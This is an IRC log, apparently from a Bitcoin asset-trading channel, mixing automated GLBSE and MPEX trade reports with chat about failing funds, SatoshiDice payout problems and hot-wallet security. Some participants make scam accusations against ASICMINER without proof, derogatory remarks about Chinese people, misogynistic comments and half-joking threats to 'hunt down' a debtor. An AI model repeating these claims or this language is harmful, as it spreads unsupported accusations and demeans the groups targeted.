EskimoBob: there you go again with that Sep 08 22:09:03 it will cost me some btc but glbse and #assets will be a better place Sep 08 22:09:13 PsychoticBoy: what better place, though? Sep 08 22:09:25 [GLBSE] [ASICMINER] 100 @ 0.11011 = 11.011 BTC [-] Sep 08 22:09:32 PsychoticBoy i don't think it's worth it tbh.\ Sep 08 22:09:37 EskimoBob: I traded current earnings for future earnings. Sep 08 22:09:38 glbse can't be fixed anyway. Sep 08 22:09:45 mircea_popescu: I agree, but neither can mpex Sep 08 22:09:46 yes D you traded more than 4000 dmc for 50 btc Sep 08 22:09:50 both should probably be shut down Sep 08 22:10:03 PsychoticBoy: yes, I traded 4000 dmc to usagi to keep his investment fund afloat. Sep 08 22:10:12 ahahaha Sep 08 22:10:18 yep and destroyed your own further Sep 08 22:10:31 lol Sep 08 22:10:32 well that seems scarcely a concern by now Sep 08 22:10:37 come on usagi tell us Sep 08 22:10:39 usagi: its more true than you want to admit. Sep 08 22:10:48 its not like I got nothing out of it though Sep 08 22:10:53 d stfu let usagi speak Sep 08 22:11:12 [GLBSE] [BBBB] 4 @ 0.0002125 = 0.0009 BTC [-] Sep 08 22:11:13 [MPEX] [F.GIGA.ETF] 22600 @ 0.0005 = 11.3 BTC [-] Sep 08 22:11:33 holy shit giga trading at 50 now ? Sep 08 22:11:34 EskimoBob: okay, so what would happen if dmc nav exceeded 1 btc? Sep 08 22:11:45 lol ok D ill buy dmc at 300 btc Sep 08 22:12:01 [GLBSE] [SYNERGY] 5 @ 0.15 = 0.75 BTC [-] Sep 08 22:12:03 [GLBSE] [SYNERGY] 7 @ 0.14 = 0.98 BTC [-] Sep 08 22:12:12 and then im selling all assets and return investors their mnoney and close it Sep 08 22:12:19 [GLBSE] [ASICMINER] 46 @ 0.11011 = 5.0651 BTC [-] Sep 08 22:12:20 best option Sep 08 22:12:21 [GLBSE] [ASICMINER] 54 @ 0.11 = 5.94 BTC [-] Sep 08 22:12:26 PsychoticBoy: yes, _but I keep all future earnings_ Sep 08 22:12:30 how does that help investors? Sep 08 22:12:56 which earnings, iam selling all and closing DMC Sep 08 22:13:02 [GLBSE] [DMC] 1 @ 0.03510001 BTC [-] Sep 08 22:13:10 PsychoticBoy: except the earnings dont go away. Sep 08 22:13:20 by giving them 0.1 minimum instead of ~0.02 Sep 08 22:16:19 PsychoticBoy and he just makes a new fund. Sep 08 22:16:46 [GLBSE] [ASICMINER] 108 @ 0.1109 = 11.9772 BTC [+] Sep 08 22:17:18 PsychoticBoy and he just makes a new fund.<< NO NEVER, stop this m*n**K Sep 08 22:17:33 whats m*n**K ?! Sep 08 22:17:37 maniak Sep 08 22:17:41 lol Sep 08 22:17:55 [GLBSE] [FZB.A] 1 @ 0.03 BTC [-] Sep 08 22:23:08 [GLBSE] [OBSI.HRPT] 2 @ 0.1016 = 0.2032 BTC [-] Sep 08 22:23:29 Matthew will fail in paying, and paying he must he will lose the bet, kaching Sep 08 22:25:27 !ticker FDBF Sep 08 22:25:31 [GLBSE:FDBF] [Bid: 0.01000001] [Ask: 0.15] [Spread: 0.13999999] [Last: 0.15] [24hVol: 12.3] [7dAvg: 0.14999053] Sep 08 22:25:32 !ticker ABM Sep 08 22:25:40 [GLBSE:ABM] [Bid: 0.10000001] [Ask: 0.28] [Spread: 0.17999999] [Last: 0.1] [24hVol: ] [7dAvg: 0.1] Sep 08 22:31:00 he'll start paying on Monday Sep 08 22:31:04 it'll take a week or so Sep 08 22:31:09 starting with the oldest accounts Sep 08 22:31:14 ... wait a minute Sep 08 22:31:27 pirate also said he would pay, and did he NO Sep 08 22:31:57 green hornets are better Sep 08 22:32:36 lol MoneyIsDebt Sep 08 22:33:18 [GLBSE] [BBBB] 4 @ 0.0002125 = 0.0009 BTC [-] Sep 08 22:34:15 [MPEX] [S.MPOE] 3400 @ 0.00040069 = 1.3623 BTC [+] Sep 08 22:34:15 [MPEX] [S.MPOE] 980 @ 0.00040308 = 0.395 BTC [+] Sep 08 22:35:27 [GLBSE] [FUTUREFUND] 12 @ 0.00012433 = 0.0015 BTC [+] Sep 08 22:38:00 Matthew: http://panzner.typepad.com/.a/6a00d83451591e69e2017c31b4fcf8970b-pi Sep 08 22:43:32 [MPEX] [S.MPOE] 31100 @ 0.00040499 = 12.5952 BTC [+] Sep 08 22:46:12 [GLBSE] [BFLS.RIG] 1 @ 1.039 BTC [+] Sep 08 22:49:46 [MPEX] [S.MPOE] 11800 @ 0.00040449 = 4.773 BTC [-] Sep 08 22:50:39 who knows? maybe on interest day for BTCST pirate will repay! right guise? ...right? Sep 08 22:50:40 [MPEX] [S.BVPS] 121 @ 0.00348181 = 0.4213 BTC [+] Sep 08 22:52:48 [GLBSE] [ASICMINER] 36 @ 0.1101 = 3.9636 BTC [-] Sep 08 22:52:49 [GLBSE] [ASICMINER] 64 @ 0.11 = 7.04 BTC [-] Sep 08 22:54:23 [MPEX] [S.MPOE] 14400 @ 0.00040449 = 5.8247 BTC [-] Sep 08 22:55:26 i bought some, and made profit by selling to those with hope Sep 08 22:55:31 thanks, pirate! Sep 08 23:01:32 [GLBSE] [GSDPT] 1 @ 0.003395 BTC [+] Sep 08 23:05:00 [MPEX] [S.MPOE] 23220 @ 0.00040449 = 9.3923 BTC [-] Sep 08 23:06:11 [MPEX] [S.MPOE] 1200 @ 0.0003993 = 0.4792 BTC [-] Sep 08 23:06:12 [MPEX] [S.MPOE] 7400 @ 0.00039863 = 2.9499 BTC [-] Sep 08 23:09:48 omg pirate paid! Sep 08 23:10:03 [GLBSE] [SS] 16 @ 0.0198 = 0.3168 BTC [+] Sep 08 23:10:09 Oh! Let buy all the PPT! Sep 08 23:10:27 [GLBSE] [SILVER] 2 @ 0.01 = 0.02 BTC [+] Sep 08 23:11:06 Wait? What paid pirate today? Sep 08 23:11:13 A tea, maybe? Sep 08 23:11:15 xD Sep 08 23:11:21 pirate paid? yes 10 btc maybe Sep 08 23:11:45 not all full accounts, impossible Sep 08 23:12:01 A long drink on some caribean beach... Sep 08 23:12:17 pictures, tx or it didn`t happen Sep 08 23:12:28 lol Sep 08 23:12:53 It won't happen, take it easy xD Sep 08 23:13:47 kik Sep 08 23:13:56 :D Sep 08 23:14:03 PsychoticBoy it's just my daily-ish joke Sep 08 23:14:08 altho sometimes i miss a day Sep 08 23:14:30 its a good one lol Sep 08 23:14:45 You'll kill somebody with your joke Sep 08 23:14:54 We need a cardiologist :) Sep 08 23:15:43 AED plz.... and clear Sep 08 23:22:08 [GLBSE] [PUREMINING] 6 @ 0.09577 = 0.5746 BTC [+] Sep 08 23:28:00 [GLBSE] [OBSI.HRPT] 12 @ 0.101599 = 1.2192 BTC [-] Sep 08 23:28:46 a chilli? Sep 08 23:28:58 usagi are you a single female with a desire to see the usa? ;) Sep 08 23:29:17 no he is a male ;) Sep 08 23:29:37 as much as a girl as i am, guy in real life Sep 08 23:33:03 [GLBSE] [ASICMINER] 36 @ 0.1101 = 3.9636 BTC [+] Sep 08 23:33:04 lmao Ignatius-otc are you picking up ? Sep 08 23:33:04 [GLBSE] [ASICMINER] 64 @ 0.11 = 7.04 BTC [-] Sep 08 23:33:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.04142624 BTC [-] Sep 08 23:35:24 [MPEX] [S.MPOE] 48252 @ 0.00040046 = 19.323 BTC [+] Sep 08 23:35:42 mircea_popescu: is it possible to query mpex for the current strike price? Sep 08 23:35:43 [GLBSE] [ASICMINER] 36 @ 0.1101 = 3.9636 BTC [+] Sep 08 23:35:45 [GLBSE] [ASICMINER] 64 @ 0.11 = 7.04 BTC [-] Sep 08 23:36:03 sgnb mpex doesn't use that concept tho. you can query for the order book Sep 08 23:36:13 or you mean last trade price ? Sep 08 23:36:25 I mean the strike price used for exercising options Sep 08 23:37:11 o. Sep 08 23:37:15 ;;bc,24hprc Sep 08 23:37:16 10.99 Sep 08 23:37:17 that. Sep 08 23:37:36 [GLBSE] [ASICMINER] 4 @ 0.11 = 0.44 BTC [-] Sep 08 23:37:37 [GLBSE] [ASICMINER] 30 @ 0.106 = 3.18 BTC [-] Sep 08 23:37:39 [GLBSE] [ASICMINER] 5 @ 0.10500002 = 0.525 BTC [-] Sep 08 23:37:40 [GLBSE] [ASICMINER] 50 @ 0.10500001 = 5.25 BTC [-] Sep 08 23:37:41 [GLBSE] [ASICMINER] 11 @ 0.10500001 = 1.155 BTC [-] Sep 08 23:37:59 Hey, they keep dumping ASICMINER Sep 08 23:38:04 Bad news? Sep 08 23:38:08 mircea_popescu, I need someone to cook and clean...ideally...brb foods Sep 08 23:38:16 maybe just general market chill after pirate/hashking/etc Sep 08 23:38:28 [GLBSE] [NYAN.C] 1 @ 0.689 BTC [-] Sep 08 23:38:47 mircea_popescu: that's an external source, isn't it? what happens if it is unavailable? Sep 08 23:39:04 yes asicminer is (what I think if I look at the past asicminer with same (almost) contract its a scam Sep 08 23:39:13 sgnb then mpex doesn't quote anymore. Sep 08 23:39:23 look at the contract damnit Sep 08 23:39:32 look the date Sep 08 23:39:39 august 28 2011 Sep 08 23:39:43 same as last year Sep 08 23:39:52 cant find it Sep 08 23:39:55 yes Sep 08 23:40:10 it s been tried in june 2011 Sep 08 23:40:30 mircea_popescu: meaning exercise won't work, right? Sep 08 23:40:59 [GLBSE] [ASICMINER] 39 @ 0.10500001 = 4.095 BTC [-] Sep 08 23:41:00 so, if it looks like a duck, quacks like a duck then it IS a duck Sep 08 23:41:01 [GLBSE] [ASICMINER] 61 @ 0.105 = 6.405 BTC [-] Sep 08 23:41:04 well, you won't be able to exercise by ordering on mpex. Sep 08 23:41:19 if the situation is transient (as it happened, a few hours tops in the past) then that's what it is. Sep 08 23:41:22 asicminer is a scam, mark my words Sep 08 23:41:31 if for whatver reason the service goes away i'll come up with some alternative. Sep 08 23:41:42 mark my words, you too Diablo-D3 Sep 08 23:41:54 you up your ass in asicminer Sep 08 23:41:58 dumb Sep 08 23:42:29 and DUMP Sep 08 23:42:40 [GLBSE] [ASICMINER] 5 @ 0.1059 = 0.5295 BTC [+] Sep 08 23:42:59 :D Sep 08 23:43:01 moar Sep 08 23:43:05 sgnb but you do bring up an interesting point, i'm going to have to add this to the faq. Sep 08 23:43:20 I sold when price was .14 :D Sep 08 23:43:37 mircea_popescu: that would be very nice Sep 08 23:44:30 the faq is currently vague on what it takes for spot price Sep 08 23:47:51 [GLBSE] [FUTUREFUND] 3 @ 0.00012433 = 0.0004 BTC [+] Sep 08 23:49:03 [GLBSE] [ASICMINER] 10 @ 0.1058 = 1.058 BTC [-] Sep 08 23:49:05 [GLBSE] [ASICMINER] 100 @ 0.106 = 10.6 BTC [+] Sep 08 23:54:13 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [-] Sep 08 23:55:05 sgnb http://polimedia.us/bitcoin/faq.html#25 Sep 08 23:57:00 [GLBSE] [ASICMINER] 39 @ 0.105 = 4.095 BTC [-] Sep 08 23:59:43 I bet I will be kicked in the nuts Sep 08 23:59:47 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [-] Sep 09 00:00:27 mircea_popescu: thanks Sep 09 00:00:45 [GLBSE] [BBBB] 5 @ 0.0002125 = 0.0011 BTC [-] Sep 09 00:00:47 as mod/staff member theymos advised me not to Sep 09 00:01:08 [GLBSE] [FUTUREFUND] 12 @ 0.00012433 = 0.0015 BTC [+] Sep 09 00:01:18 because I cant prove it Sep 09 00:01:43 o you're forum staff PsychoticBoy ? Sep 09 00:01:43 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [-] Sep 09 00:02:56 hope not, that would mean friedcat is selling moar crap Sep 09 00:03:30 yes Sep 09 00:03:35 mircea I am Sep 09 00:04:18 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [-] Sep 09 00:04:48 dude, if you discover a scam, you better report it or you are like the scammer too<< sry I got no data of the old contract, so no prove Sep 09 00:05:00 [GLBSE] [ASICMINER] 10 @ 0.1058 = 1.058 BTC [+] Sep 09 00:05:01 [GLBSE] [ASICMINER] 100 @ 0.106 = 10.6 BTC [+] Sep 09 00:05:14 wowzers asicminer selloff Sep 09 00:05:39 yep I know usagi , it is the same but I cant prove it Sep 09 00:06:31 If people read contracts they will know, the prove is in the contract but its not hard prove Sep 09 00:06:58 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [-] Sep 09 00:08:10 1+1=2 Sep 09 00:08:57 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [-] Sep 09 00:10:20 [GLBSE] [ASICMINER] 43 @ 0.105 = 4.515 BTC [-] Sep 09 00:10:26 2+2 = 5 Sep 09 00:12:50 http://heartiste.wordpress.com/2011/11/22/social-media-and-female-self-esteem/ Sep 09 00:12:53 this is an interesting read Sep 09 00:18:59 [MPEX] [F.GIGA.ETF] 7800 @ 0.00053278 = 4.1557 BTC [+] Sep 09 00:20:07 [GLBSE] [OBSI.HRPT] 8 @ 0.101599 = 0.8128 BTC [-] Sep 09 00:23:31 [GLBSE] [BITCOINRS] 78 @ 0.05 = 3.9 BTC [-] Sep 09 00:24:04 [GLBSE] [BITCOINRS] 20 @ 0.0515 = 1.03 BTC [+] Sep 09 00:32:54 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [-] Sep 09 00:36:51 [GLBSE] [OBSI.HRPT] 1 @ 0.101599 BTC [-] Sep 09 00:37:13 [GLBSE] [DI.BFLSC.FAIL] 14 @ 0.001 = 0.014 BTC [+] Sep 09 00:40:19 [MPEX] [S.MPOE] 7348 @ 0.00040008 = 2.9398 BTC [-] Sep 09 00:40:19 [MPEX] [S.MPOE] 30012 @ 0.00040016 = 12.0096 BTC [+] Sep 09 00:46:03 [MPEX] [S.MPOE] 8100 @ 0.00039998 = 3.2398 BTC [-] Sep 09 00:46:03 [MPEX] [S.MPOE] 48973 @ 0.00039979 = 19.5789 BTC [-] Sep 09 01:04:29 [GLBSE] [OBSI.HRPT] 4 @ 0.101599 = 0.4064 BTC [-] Sep 09 01:09:54 [GLBSE] [ASICMINER] 257 @ 0.105 = 26.985 BTC [-] Sep 09 01:09:55 [GLBSE] [ASICMINER] 50 @ 0.10243001 = 5.1215 BTC [-] Sep 09 01:09:57 [GLBSE] [ASICMINER] 250 @ 0.10243 = 25.6075 BTC [-] Sep 09 01:09:58 [GLBSE] [ASICMINER] 42 @ 0.10232 = 4.2974 BTC [-] Sep 09 01:09:59 [GLBSE] [ASICMINER] 44 @ 0.1022999 = 4.5012 BTC [-] Sep 09 01:10:00 [GLBSE] [ASICMINER] 20 @ 0.10221011 = 2.0442 BTC [-] Sep 09 01:10:01 [GLBSE] [ASICMINER] 20 @ 0.10221011 = 2.0442 BTC [-] Sep 09 01:10:02 [GLBSE] [ASICMINER] 100 @ 0.1022101 = 10.221 BTC [-] Sep 09 01:10:03 [GLBSE] [ASICMINER] 5 @ 0.102 = 0.51 BTC [-] Sep 09 01:10:04 [GLBSE] [ASICMINER] 60 @ 0.10111011 = 6.0666 BTC [-] Sep 09 01:10:05 [GLBSE] [ASICMINER] 100 @ 0.10111 = 10.111 BTC [-] Sep 09 01:15:42 quite the sell-off huh Sep 09 01:17:08 [GLBSE] [ASICMINER] 10 @ 0.0999 = 0.999 BTC [-] Sep 09 01:17:20 [GLBSE] [FOO.PPPPT] 5 @ 0.1 = 0.5 BTC [+] Sep 09 01:18:27 What's this business about an ASICMINER scam? Sep 09 01:22:54 Obsi apparently there existed some offering by the same name last year. Sep 09 01:23:02 or at least so PsychoticBoy was saying Sep 09 01:23:16 yes there was all can read though so Sep 09 01:23:36 proof is under your nose Sep 09 01:23:47 asicminer.net? https://bitcointalk.org/index.php?topic=29696.0 Sep 09 01:23:54 read the contract Sep 09 01:24:01 also Sep 09 01:24:33 obsi you totally got it Sep 09 01:25:19 1+1 = 2 Sep 09 01:25:32 almost same contract, same location Sep 09 01:25:42 [GLBSE] [BLUECHIP] 5 @ 0.1 = 0.5 BTC Sep 09 01:26:11 I dont got the hard prove but I believe what I see Sep 09 01:26:53 Diablo-D3: what's your opinion on this? Sep 09 01:27:01 hahaha hes fucked Sep 09 01:27:09 with his shares Sep 09 01:27:23 not only his DMC shares now also asicminer Sep 09 01:27:43 I hope I am wrong b ut it obvious Sep 09 01:28:02 Yeah OBSI.ABMO is holding 5,000 of them as well, I was not aware of this older asicminer Sep 09 01:28:04 one word: facepalm Sep 09 01:28:43 [GLBSE] [ASICMINER] 2 @ 0.0999 = 0.1998 BTC [-] Sep 09 01:29:05 chinees ppl like to fuck us, dogs in the food, and now crappy assets Sep 09 01:29:47 It's a race to buy bitcoin before the Chinese Sep 09 01:29:57 lol asicminer under 0.1 Sep 09 01:30:08 come on drop bitch Sep 09 01:30:36 cheap chinees crap, their imitation shizzle is always crap too Sep 09 01:31:21 lol Sep 09 01:31:47 they wait for bfl then imitate the chip and board Sep 09 01:32:36 with cheaper less durable (even less than bfl) shizzle chips and boards Sep 09 01:32:43 lol Sep 09 01:32:56 [GLBSE] [ASICMINER] 91 @ 0.0999 = 9.0909 BTC [-] Sep 09 01:32:57 [GLBSE] [ASICMINER] 9 @ 0.1 = 0.9 BTC [+] Sep 09 01:34:26 hahaha like this: pirate has paid? huh mircea lol Sep 09 01:36:37 ;;tslb Sep 09 01:36:41 Time since last block: 1 hour, 1 minute, and 12 seconds Sep 09 01:36:45 damn Sep 09 01:37:03 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Sep 09 01:37:03 and? Sep 09 01:37:09 what? Sep 09 01:37:15 pirate paid! Sep 09 01:37:18 lol Sep 09 01:37:32 for a latte at starbucks Sep 09 01:37:40 lmfao Sep 09 01:38:07 almost* Sep 09 01:38:18 I am banned Sep 09 01:38:54 [GLBSE] [JAH] 20 @ 0.149 = 2.98 BTC [-] Sep 09 01:39:11 [GLBSE] [OBSI.HRPT] 1 @ 0.1015899 BTC [-] Sep 09 01:39:17 ok ill try Sep 09 01:39:17 [GLBSE] [FOO.PPPPT] 5 @ 0.1 = 0.5 BTC [+] Sep 09 01:39:31 banned :( Sep 09 01:39:47 because I told pirate the truth Sep 09 01:40:39 If had more than 2k in his savings I would hunt him down Sep 09 01:41:38 someone should probably tell evoorhees Sep 09 01:41:38 that satoshidice just broke Sep 09 01:41:45 and is now holding over 1000 BTC in winnings Sep 09 01:41:47 that dont belong Sep 09 01:42:17 ;;later tell deadterra you have any comments on https://bitcointalk.org/index.php?topic=29696.160 ? Sep 09 01:42:19 The operation succeeded. Sep 09 01:42:30 http://www.satoshidice.com/ Sep 09 01:42:32 check it out Sep 09 01:42:56 what a piece of shit Sep 09 01:43:01 SELL SELL SELL Sep 09 01:43:19 rg huh ? Sep 09 01:43:28 satoshidice is broken Sep 09 01:43:32 so people should sell their shares Sep 09 01:43:34 cause it sucks Sep 09 01:43:54 can you get moar concrete than that ? Sep 09 01:43:59 i was just trying to show a friend how it works Sep 09 01:44:00 and it breaks Sep 09 01:44:15 [GLBSE] [SS] 17 @ 0.0198 = 0.3366 BTC [+] Sep 09 01:44:20 i just feel bad for the guy whos not going to get his 100 BTC payout now Sep 09 01:44:22 ok the unknowns ? Sep 09 01:44:28 yes Sep 09 01:44:31 unknown = not sending Sep 09 01:44:35 not for a very long time Sep 09 01:44:51 i dunno what that is Sep 09 01:44:51 i had a friend wait three days Sep 09 01:44:54 for an unknown Sep 09 01:44:57 its their code Sep 09 01:44:58 breaking Sep 09 01:45:15 pretty simple Sep 09 01:45:17 hm Sep 09 01:45:18 [GLBSE] [ASICMINER] 222 @ 0.1 = 22.2 BTC [+] Sep 09 01:45:37 lol people are still throwing money at it Sep 09 01:45:39 I know eskimobob, he is a conceited bitch Sep 09 01:45:41 every bet is going unknown Sep 09 01:46:25 this is probably how SD reports 1000 btc income Sep 09 01:46:27 for 1 day Sep 09 01:46:29 [MPEX] [F.GIGA.ETF] 24063 @ 0.0005 = 12.0315 BTC [-] Sep 09 01:46:32 its just in the queue to be paid Sep 09 01:46:36 and it pays out at 12AM EST Sep 09 01:46:42 at least thts when i get paid my unknowns Sep 09 01:46:52 well i shot him an email in case he's not aware Sep 09 01:47:02 hes aware Sep 09 01:47:03 so people are still claiming asicminer is a scam? Sep 09 01:47:04 this happens all the time Sep 09 01:47:17 aware & fixing are apparently different Sep 09 01:47:32 Diablo-D3 they were earlier. Sep 09 01:47:51 I dont think it is Sep 09 01:47:54 i guantee you no asic miners will ever come out Sep 09 01:48:25 rg that may be a little much. why not ? Sep 09 01:48:28 I almost certain it is look at contract and past Sep 09 01:48:30 im pretty sure we'll have some eventuyally. Sep 09 01:48:50 look Sep 09 01:48:54 i can guarantee you anything you want Sep 09 01:49:11 guarantee me bitches Sep 09 01:49:15 lol Sep 09 01:49:18 lol Sep 09 01:50:38 he ows me Sep 09 01:50:56 1k Sep 09 01:51:22 I would hunt him down for that, if I werent in Europe Sep 09 01:52:12 if it was 2k I would hunt him down in the US Sep 09 01:52:19 I would take flight Sep 09 01:52:28 man Sep 09 01:52:30 I should start a scam =/ Sep 09 01:53:08 PsychoticBoy plane ticket is what, 2k ? Sep 09 01:53:21 no 980eur Sep 09 01:53:32 to NY Sep 09 01:54:02 one way ticket Sep 09 01:54:06 [GLBSE] [OBSI.HRPT] 9 @ 0.1015899 = 0.9143 BTC [-] Sep 09 01:54:08 okay so Sep 09 01:54:14 Im going to start a fund Sep 09 01:54:15 from Holland Sep 09 01:54:16 well and you remain there ? not coming back ? Sep 09 01:54:22 that pays out 7% yearly Sep 09 01:54:56 Yes thats what i meant that kind of trip is gonna cost me so Sep 09 01:55:15 I live in the netherlands Sep 09 01:55:18 ok Sep 09 01:55:24 [GLBSE] [ASICMINER] 2 @ 0.10599 = 0.212 BTC [+] Sep 09 01:55:41 plz send to 19R1QWDSEYN8X3yLdJPpSbwnR8Ka3LEFxP and help me through winter Sep 09 01:56:36 the pot of gold at the end of the rainbow Sep 09 01:56:42 no not yet Sep 09 01:56:50 its 25C here now Sep 09 01:57:16 its summer here Sep 09 01:57:52 winter will start november/december Sep 09 01:58:18 then it will be -5C-+10C Sep 09 01:58:49 we are not eskimo`s ;) Sep 09 02:00:15 lol Sep 09 02:00:26 ok we dont have real winters Sep 09 02:00:56 we ll be lucky if we can iceskate for a week per year Sep 09 02:01:54 [MPEX] [S.MPOE] 8275 @ 0.00039985 = 3.3088 BTC [+] Sep 09 02:01:56 [MPEX] [S.MPOE] 7320 @ 0.00039979 = 2.9265 BTC [-] Sep 09 02:01:57 [MPEX] [S.MPOE] 38205 @ 0.00039903 = 15.2449 BTC [-] Sep 09 02:02:35 you know the real sketchy thing about satoshidice.com Sep 09 02:02:38 theres no 'contact' Sep 09 02:02:46 so even if you have a problem, you cant do anything about it Sep 09 02:03:00 youd think a site that is dealing with 100's of thousands o dollars a day Sep 09 02:03:08 would have some customer support, yea? Sep 09 02:03:13 contact evoorhees is the only option Sep 09 02:03:18 right Sep 09 02:03:20 that's my point Sep 09 02:03:30 i mean for a company who just took in 11k btc for an IPO Sep 09 02:03:32 i imagine if they shelled out for support it'd cost more. Sep 09 02:03:36 youd think they could hire someone / get it running properly Sep 09 02:03:46 [MPEX] [S.MPOE] 2595 @ 0.00039903 = 1.0355 BTC [-] Sep 09 02:03:47 [MPEX] [S.MPOE] 9137 @ 0.00039863 = 3.6423 BTC [-] Sep 09 02:03:49 [MPEX] [S.MPOE] 28868 @ 0.00039853 = 11.5048 BTC [-] Sep 09 02:03:52 mircea_popescu: even MPEX has suppot Sep 09 02:03:58 support* Sep 09 02:04:04 even ? lol Sep 09 02:05:04 [GLBSE] [NASTY] 2 @ 0.6 = 1.2 BTC [-] Sep 09 02:05:11 yes even mpex Sep 09 02:05:30 [MPEX] [S.MPOE] 15932 @ 0.00039853 = 6.3494 BTC [-] Sep 09 02:05:31 [MPEX] [S.MPOE] 35000 @ 0.00039794 = 13.9279 BTC [-] Sep 09 02:05:32 [MPEX] [S.MPOE] 3068 @ 0.00039712 = 1.2184 BTC [-] Sep 09 02:05:41 [GLBSE] [MOVETO.FUND] 5 @ 1.03 = 5.15 BTC [-] Sep 09 02:05:43 [GLBSE] [NASTY] 1 @ 0.61 BTC [+] Sep 09 02:05:44 [GLBSE] [IBB] 1 @ 0.608 BTC [+] Sep 09 02:06:24 [GLBSE] [NASTY] 2 @ 0.613 = 1.226 BTC [+] Sep 09 02:08:59 [GLBSE] [ASICMINER] 20 @ 0.10599 = 2.1198 BTC [+] Sep 09 02:12:37 [GLBSE] [MOVETO.FUND] 2 @ 1.03 = 2.06 BTC [-] Sep 09 02:12:55 [GLBSE] [OBSI.HRPT] 14 @ 0.1015899 = 1.4223 BTC [-] Sep 09 02:16:27 [GLBSE] [YABIF] 10 @ 0.97 = 9.7 BTC [-] Sep 09 02:19:07 [GLBSE] [MERGEDMINING] 4 @ 0.07499 = 0.3 BTC [+] Sep 09 02:21:16 [GLBSE] [BDK.BND] 100 @ 0.1 = 10 BTC [+] Sep 09 02:22:38 http://polimedia.us/dtng/c/src/134237522533.jpg have somefruits gents. Sep 09 02:22:44 [GLBSE] [JLP-BMD] 1 @ 0.0998 BTC [-] Sep 09 02:22:45 [GLBSE] [MERGEDMINING] 1 @ 0.07499 BTC [+] Sep 09 02:22:59 oh snap Sep 09 02:24:23 [GLBSE] [GIGAMINING] 12 @ 0.602 = 7.224 BTC [+] Sep 09 02:24:25 [GLBSE] [GIGAMINING] 1 @ 0.6011 BTC [-] Sep 09 02:24:26 [GLBSE] [GIGAMINING] 3 @ 0.601 = 1.803 BTC [-] Sep 09 02:24:27 [GLBSE] [GIGAMINING] 9 @ 0.601 = 5.409 BTC [-] Sep 09 02:24:29 [GLBSE] [GIGAMINING] 1 @ 0.6001 BTC [-] Sep 09 02:24:30 [GLBSE] [GIGAMINING] 7 @ 0.6 = 4.2 BTC [-] Sep 09 02:27:43 mircea_popescu: do you take all these photos? Sep 09 02:27:49 or just collect them Sep 09 02:27:58 you know what 4chan is right ? Sep 09 02:28:04 yup Sep 09 02:28:18 mircea_popescu likes /d/ Sep 09 02:28:33 copumpkin well the same principle. moot doesn't take the pic Sep 09 02:28:42 was just curious :) Sep 09 02:28:48 mircea_popescu: actually, he might Sep 09 02:28:49 I thought you said you were a photographer at some point Sep 09 02:29:01 and given your other interests, it wouldn't be a huge stretch for you to take these yourself Sep 09 02:29:25 copumpkin well i have tons of chicks pix i took myself, but i don't tend to publish Sep 09 02:29:27 [MPEX] [S.MPOE] 42098 @ 0.00039712 = 16.718 BTC [-] Sep 09 02:29:29 [MPEX] [S.MPOE] 4102 @ 0.00039711 = 1.6289 BTC [-] Sep 09 02:29:30 ah Sep 09 02:29:37 :D Sep 09 02:29:52 after all, they're not models, they're just sluts. Sep 09 02:31:22 i should prolly add this to the mpex faq as a security factor : someone breaking into my sikrit vault is more likely to steal the pix of angelina jolie sucking my cock than your bitcoinz Sep 09 02:32:06 >bitcoins Sep 09 02:32:07 >vault Sep 09 02:33:32 the boston company ? Sep 09 02:36:08 dunno if they're in boston Sep 09 02:36:52 [GLBSE] [GSDPT] 50 @ 0.003395 = 0.1698 BTC [+] Sep 09 02:38:53 [GLBSE] [PUREMINING] 1 @ 0.09577 BTC [+] Sep 09 02:39:40 [GLBSE] [FPGAMINING] 5 @ 0.74510001 = 3.7255 BTC [-] Sep 09 02:39:41 [GLBSE] [FPGAMINING] 5 @ 0.74500001 = 3.725 BTC [-] Sep 09 02:39:43 [GLBSE] [FPGAMINING] 1 @ 0.745 BTC [-] Sep 09 02:39:44 [GLBSE] [FPGAMINING] 5 @ 0.74000001 = 3.7 BTC [-] Sep 09 02:39:45 [GLBSE] [FPGAMINING] 6 @ 0.74 = 4.44 BTC [-] Sep 09 02:41:08 As GLBSE is collapsing along with Nefario's trust level, I decided to provide the community with a system that would allow asset issuers to smoothly migrate their customers to a new asset management platform, based on a completely different security and trust system. Sep 09 02:41:08 Unlike GLBSE, #assets-otc is not a trading system, but just a contract management system (at least for the moment). Sep 09 02:41:18 lol, let us reimplement mpex Sep 09 02:47:42 The piotr-n thing? Sep 09 02:47:52 yeah Sep 09 02:48:22 Yeah, a lot more trustworthy Sep 09 02:48:30 lol Sep 09 02:48:32 yeah :D Sep 09 02:48:59 as they say, intelligent people make new things, stupid people reimplement old things poorly. Sep 09 02:49:21 "After yet another exchange being hacked, I can't help asking myself: Why do exchanges need a hot wallet on the server at all?" Sep 09 02:49:33 o wow, someone on the forum is getting an idea. Sep 09 02:49:35 im impressed. Sep 09 02:49:48 lol Sep 09 02:49:54 Creativity is booming! Sep 09 02:52:17 [GLBSE] [OBSI.HRPT] 1 @ 0.1015899 BTC [-] Sep 09 02:52:53 [GLBSE] [FOO.PPPPT] 10 @ 0.1 = 1 BTC [+] Sep 09 02:53:32 hm Sep 09 02:53:41 smpake is one big hot wallet :( Sep 09 02:54:12 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 09 02:55:37 that's maybe not so great. Sep 09 02:55:51 Can I short it kako? Sep 09 02:55:53 kakobrekla : have money go to your paper/otherwise secure wallet. Sep 09 02:55:57 ;) Sep 09 02:56:09 and only pay from some funds you keep in the hot wallet, maybe 1-200 btc tops Sep 09 02:56:48 meh Sep 09 02:56:56 im just gonna make it unhackable Sep 09 02:57:01 ;> Sep 09 02:57:12 That's the spirit! Sep 09 02:57:35 lol Sep 09 02:57:55 ya, make it unhackable Sep 09 02:58:08 THEN, make all payments to to secure wallet and only pay from the 1-200 btc hotwallet on site Sep 09 02:59:30 [GLBSE] [FDBF] 2 @ 0.15 = 0.3 BTC [+] Sep 09 02:59:32 well accually Sep 09 02:59:37 there is no hot wallet Sep 09 02:59:42 just a bunch of api keys Sep 09 02:59:57 The "unhackability" of things tend to be inversely proportional to the value those thing store Sep 09 03:00:05 uhum Sep 09 03:01:57 